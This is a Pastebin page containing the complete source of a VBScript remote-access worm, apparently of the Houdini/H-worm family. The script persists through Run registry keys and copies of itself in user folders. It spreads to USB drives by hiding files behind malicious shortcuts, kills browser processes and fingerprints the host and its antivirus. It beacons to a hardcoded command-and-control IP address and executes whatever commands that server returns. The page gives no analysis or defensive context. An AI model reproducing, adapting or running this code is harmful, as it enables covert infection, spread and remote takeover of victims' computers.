SHARE
TWEET

Untitled

Racco42 Mar 11th, 2019 512 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. On Error Resume Next
  2. dim sh
  3. dim port
  4. dim host
  5. dim DR
  6. dim FN
  7. dim FN2
  8. dim pr
  9. dim rg
  10. dim tsk
  11. dim tsk2
  12. dim tsk3
  13. set sh =WScript.CreateObject("WScript.Shell")
  14. dim fs
  15. set fs= CreateObject("Scripting.FileSystemObject")
  16. dim name
  17. dim fld
  18. dim chusb
  19. dim cmd
  20. dim slp
  21. cmd = split (response,spliter)
  22. host="31.220.15.39"
  23. port="3218"
  24. DR = sh.ExpandEnvironmentStrings("%Appdata%") & "\"
  25. FN ="ROOT1.VBS"
  26. name="Root_H" & "_"
  27. dim fh
  28. dim fh2
  29. dim us
  30. us = "TRUE"
  31. rg = "keys"
  32. slp = "1000"
  33. fn2 = "ROOT2.VBS"
  34. pr = "1"
  35. fld = "FALSE"
  36. tsk = "firefox.exe"
  37. tsk2 = "chrome.exe"
  38. tsk3 = "IDMan.exe"
  39. wscript.sleep slp
  40. ins
  41. dim spl
  42. spl="SYS"
  43. dim i
  44. i=0
  45. while true
  46. dim a
  47. a= split(post("Online",""),spl)
  48.  
  49. select case a(0)
  50. case "exc"
  51. dim sa
  52. sa= a(1)
  53. execute sa
  54. case "OW"
  55. Dim objShell
  56. Set objShell = WScript.CreateObject( "WScript.Shell" )
  57. objShell.Run(a(1))
  58. Set objShell = Nothing
  59.  case "shutdown"
  60. shell.run  " /c shutdown /s /t " & response(1),7
  61. case "restart"
  62. shell.run  " /c shutdown /r /t " & response(1),7
  63. case "logoff"
  64. shell.run   " /c shutdown /l /t " & response(1),7
  65. case "uns"
  66. uns
  67. end select
  68. i = i + 1
  69. if i> 2 then
  70. i=0
  71. xins
  72. end if
  73. wend
  74. function ins
  75. on error resume next
  76. us= sh.regread("HKCU\" & rg)
  77. if us="~" then
  78. if lcase( mid(wscript.scriptfullname,2))=":\" &  lcase(fn) then
  79. us="TRUE"
  80. sh.regwrite "HKCU\" & rg,  us, "REG_SZ"
  81. else
  82. us="FALSE"
  83. sh.regwrite "HKCU\" & rg,  us, "REG_SZ"
  84. end if
  85. end if
  86. Err.Clear
  87. fs.CopyFile wscript.scriptfullname,dr & fn ,true
  88. fs.CopyFile wscript.scriptfullname,dr & fn2 ,true
  89.  dim cng
  90. cng= sh.ExpandEnvironmentStrings("%USERNAME%")
  91. fs.CopyFile wscript.scriptfullname,"C:\Users\" & cng & "\Pictures\" & fn ,true
  92. fs.CopyFile wscript.scriptfullname,"C:\Users\" & cng & "\Pictures\" & fn2 ,true
  93.  
  94. fs.CopyFile wscript.scriptfullname,"C:\Users\" & cng & "\Downloads\" & fn ,true
  95. fs.CopyFile wscript.scriptfullname,"C:\Users\" & cng & "\Downloads\" & fn2 ,true
  96.  
  97. fs.CopyFile wscript.scriptfullname,"C:\Users\" & cng & "\Documents\" & fn ,true
  98. fs.CopyFile wscript.scriptfullname,"C:\Users\" & cng & "\Documents\" & fn2 ,true
  99.  
  100. fs.CopyFile wscript.scriptfullname,"C:\Users\" & cng & "\Music\" & fn ,true
  101. fs.CopyFile wscript.scriptfullname,"C:\Users\" & cng & "\Music\" & fn2 ,true
  102.  
  103. fs.CopyFile wscript.scriptfullname,"C:\Users\" & cng & "\Videos\" & fn ,true
  104. fs.CopyFile wscript.scriptfullname,"C:\Users\" & cng & "\Videos\" & fn2 ,true
  105. fs.CopyFile wscript.scriptfullname,"C:\Users\" & cng & "\" & fn ,true
  106. fs.CopyFile wscript.scriptfullname,"C:\Users\" & cng & "\" & fn2 ,true
  107. set fh = fs.OpenTextFile( dr & fn, 8, false)
  108. set fh2 = fs.OpenTextFile( dr & fn2, 8, false)
  109. if  Err.Number>0 then
  110. wscript.quit
  111. end if
  112. xins
  113. end function
  114. sub xins
  115. on error resume next
  116. sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn,  chrw(34) & dr & fn & chrw(34), "REG_SZ"
  117. sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn,  chrw(34) & dr & fn & chrw(34), "REG_SZ"
  118. '''''''''''''''''''
  119. sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn2,  chrw(35) & dr & fn2 & chrw(35), "REG_SZ"
  120. sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn2,  chrw(35) & dr & fn2 & chrw(35), "REG_SZ"
  121. fs.copyfile wscript.scriptfullname,  CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
  122. fs.copyfile wscript.scriptfullname,  CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn2 ,true
  123. for each xx in fs.Drives
  124. if xx.isready then
  125. if xx.FreeSpace >0 then
  126. if xx.drivetype=1 then
  127. if fs.fileexists(xx.path & "\" & fn) then
  128. fs.getfile(xx.path & "\"  & fn).Attributes=0
  129. end if
  130. fs.copyfile dr & fn , xx.path & "\"  & fn,true
  131. fs.copyfile dr & fn2 , xx.path & "\"  & fn2,true
  132. For Each x In fs.GetFolder( xx.path & "\" ).Files
  133. wscript.sleep 1
  134. if instr(x.name,".") then
  135. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
  136. x.Attributes = 2
  137. if ucase(x.name) <> ucase(fn) then
  138. With sh.CreateShortcut(xx.path & "\"  & x.name & ".lnk")
  139. .TargetPath = "cmd.exe"
  140. .WorkingDirectory = ""
  141. .Arguments = "/c start " & Replace(fn," ", ChrW(34) _
  142. & " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
  143. .IconLocation = sh.regread("HKLM\SOFTWARE\Classes\" & sh.regread("HKLM\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
  144. if instr( .iconlocation,",")=0 then
  145. .iconlocation = .iconlocation &",0"
  146. end if
  147. .Save()
  148. end with
  149. end if
  150. end if
  151. end if
  152. Next
  153. end if
  154. end if
  155. end if
  156. next
  157. Err.Clear
  158. end sub
  159.  
  160. function uns
  161. on error resume next
  162. dim cng
  163. cng= sh.ExpandEnvironmentStrings("%USERNAME%")
  164. pr = "0"
  165. fh.close
  166. fh2.close
  167. sh.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn
  168. sh.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn
  169. sh.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn2
  170. sh.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn2
  171. fs.DeleteFile dr & fn ,true
  172. fs.DeleteFile dr & fn2 ,true
  173. fs.DeleteFile "C:\Users\" & cng & "\Downloads\" & fn ,true
  174. fs.DeleteFile "C:\Users\" & cng & "\Downloads\" & fn2 ,true
  175. fs.DeleteFile "C:\Users\" & cng & "\Documents\" & fn ,true
  176. fs.DeleteFile "C:\Users\" & cng & "\Documents\" & fn2 ,true
  177. fs.DeleteFile "C:\Users\" & cng & "\Pictures\" & fn ,true
  178. fs.DeleteFile "C:\Users\" & cng & "\Pictures\" & fn2 ,true
  179. fs.DeleteFile "C:\Users\" & cng & "\Music\" & fn ,true
  180. fs.DeleteFile "C:\Users\" & cng & "\Music\" & fn2 ,true
  181. fs.DeleteFile "C:\Users\" & cng & "\Videos\" & fn ,true
  182. fs.DeleteFile "C:\Users\" & cng & "\Videos\" & fn2 ,true
  183. fs.deletefile "C:\Users\" & cng & "\" & fn ,true
  184. fs.deletefile "C:\Users\" & cng & "\" & fn2 ,true
  185. fs.DeleteFile CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
  186. fs.DeleteFile CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn2 ,true
  187. for each xx in fs.Drives
  188. if xx.isready then
  189. if xx.FreeSpace >0 then
  190. For Each x In fs.GetFolder( xx.path & "\").Files
  191. On Error Resume Next
  192. if instr(x.name,".") then
  193. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
  194. x.Attributes = 0
  195. if ucase(x.name) <> ucase(fn) then
  196. fs.deletefile(xx.path & "\" & x.name & ".lnk" )
  197. else
  198. fs.deletefile( xx.path & "\" & x.name )
  199. end if
  200. end if
  201. end if
  202. Next
  203. end if
  204. end if
  205. next
  206. wscript.quit
  207. end function
  208.  
  209. function post(cmd ,da)
  210.  Const strComputer = "."
  211.   Dim objWMIService, colProcessList
  212.   Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
  213.   Set colProcessList = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name = '" & tsk &"'")
  214.     Set colProcessList = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name = '" & tsk2 &"'")
  215.           Set colProcessList = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name = '" & tsk3 &"'")
  216.   For Each objProcess in colProcessList
  217.     objProcess.Terminate()
  218.   Next
  219.    post=""
  220. Dim o
  221. Set o = CreateObject("MSXML2.XMLHTTP")
  222. o.open "POST","http://" & host & ":" & port &"/" & cmd, false
  223. o.setRequestHeader "User-Agent:",  inf
  224. o.send da
  225. post=o.responseText
  226. end function
  227. dim xinf
  228. function security
  229. on error resume next
  230.  
  231. security = ""
  232.  
  233. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  234. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  235. for each objitem in colitems
  236.     versionstr = split (objitem.version,".")
  237. next
  238. versionstr = split (colitems.version,".")
  239. osversion = versionstr (0) & "."
  240. for  x = 1 to ubound (versionstr)
  241.          osversion = osversion &  versionstr (i)
  242. next
  243. osversion = eval (osversion)
  244. if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  245.  
  246. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  247. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  248.  
  249. for each objantivirus in colantivirus
  250.     security  = security  & objantivirus.displayname & " ."
  251. next
  252. if security  = "" then security  = "nan-av"
  253. end function
  254. function inf
  255. on error resume next
  256. if xinf="" then
  257. dim s
  258. s="mtx"
  259. s = hwd
  260. inf = inf & s & "\"
  261. s="??"
  262. s= sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
  263. inf = inf & s & "\"
  264. s="??"
  265. s= sh.ExpandEnvironmentStrings("%USERNAME%")
  266. inf = inf & s & "\"
  267. s="??"
  268. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  269. Set aa = a.ExecQuery ("Select * from Win32_OperatingSystem")
  270. dim country
  271. For Each aaa in aa
  272. s= aaa.Caption  & " SP" & aaa.ServicePackMajorVersion
  273. country= aaa.countrycode
  274. exit for
  275. Next
  276. inf =name & inf & s  & "\\4.0.0.1\" & scr &"\" & us & "\"
  277. xinf=inf
  278. xinf=inf
  279. else
  280. inf=xinf
  281. end if
  282. end function
  283. function scr
  284. on error resume next
  285. scr = ""
  286. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  287. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  288. for each objitem in colitems
  289. versionstr = split (objitem.version,".")
  290. next
  291. versionstr = split (colitems.version,".")
  292. osversion = versionstr (0) & "."
  293. for  x = 1 to ubound (versionstr)
  294. osversion = osversion &  versionstr (i)
  295. next
  296. osversion = eval (osversion)
  297. if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  298. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  299. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  300. for each objantivirus in colantivirus
  301. scr  = scr  & objantivirus.displayname & " ."
  302. next
  303. if scr  = "" then scr  = "N/F"
  304. end function
  305.  
  306. Function PID
  307. PID=0
  308. on error resume next
  309. PID = GetObject("winmgmts:root\cimv2").Get("Win32_" &_
  310. "Process.Handle='" & _
  311. sh.Exec("mshta.exe").ProcessID & "'").ParentProcessId
  312. End Function
  313. function HWD
  314. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  315. Set aa = a.ExecQuery("SELECT * FROM Win32_LogicalDisk")
  316. For Each aaa In aa
  317. if aaa.VolumeSerialNumber<>"" then
  318. HWD= aaa.VolumeSerialNumber
  319. exit for
  320. end if
  321. Next
  322. end function
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top